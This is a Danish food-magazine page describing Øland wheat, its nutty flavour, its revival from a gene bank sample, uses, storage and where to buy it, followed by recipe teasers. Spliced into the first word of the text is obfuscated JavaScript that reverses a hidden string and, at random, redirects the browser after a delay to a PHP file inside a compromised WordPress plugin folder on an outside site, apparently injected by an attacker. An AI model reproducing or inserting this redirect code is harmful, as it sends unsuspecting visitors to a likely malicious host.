Øl$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andshvede

Ølandshveden har en helt særegen smag, den er fyldig med tydelig smag og duft af nødder. Bagværk med ølandshvede dufter meget aromatisk, er saftigt og mørkt i farven. Melet har et fint rosa skær, der kan minde om spelt, som da også er ølandshvedens forfader.

Sæson
Fås hele året.

Anvendelse
Ølandshveden er kornets svar på Tornerose. Kornsorten, der i sin tid blev dyrket på den svenske ø Øland, var i adskillige år så godt som udryddet som kornsort – eller var i hvert fald udkonkurreret af mere kendte kornsorter. Heldigvis havde Nordisk Genbank sikret sig kornprøver på den gamle kornsort, som lå hengemt i genbanken under navnet Ølandsspelt. I 1998 gik en række forskere i gang med at undersøge kornet nærmere. Undersøgelsen viste, at ølandshveden er en blanding mellem vårhvede og spelt, og man forsøgte efterfølgende at dyrke kornet i større skala. Det viste sig at blive en succes, produktionen har breds sig til flere nordiske lande, herunder Danmark, og ølandshveden er efterhånden ved at have mange fans. Den minder meget om urhveden spelt i både smag og bageevne, og indeholder både mere gluten og protein end almindelig hvede. Ølandshveden er derfor meget nem at have med at gøre, den giver et mørkt og saftigt brød, som hæver godt og er rig på smag. Nybagt ølandshvedebrød behøver ikke meget andet end et godt lag koldt smør for at være en himmerigsmundfuld.

Opbevaring
Tørt.

Hvor kan det købes
I velassorterede supermarkeder og helsekostbutikker.

Trends

Populære artikler

Passioncake

Konditoren Nikolaos Strangas oplever, at mange vælger at spise sushi nytårsaften. Efter sådan et måltid er denne cremede kage med et syrligt pift af passionsfrugt

Læs mere

Syltede oliven og oste

Det er desværre de færreste, som kan få fat på helt friskhøstede oliven, så denne opskrift bruger forskellige slags oliven på glas, der vendes med

Læs mere

Pappadoms med yoghurtdip

Pappadoms er tynde og sprøde indiske brød lavet af linsemel, og ofte er de krydret med alverdens varmende krydderier. Det er muligt at lave pappadoms

Læs mere

Macarons med kaffeganache

En af dessertkunstneren Nikolaos Strangas’ absolutte hitkager er macarons: Små franske makroner med fyld af fx mynte- eller jordbærganache. Det er lykkedes MAD&venner at lokke

Læs mere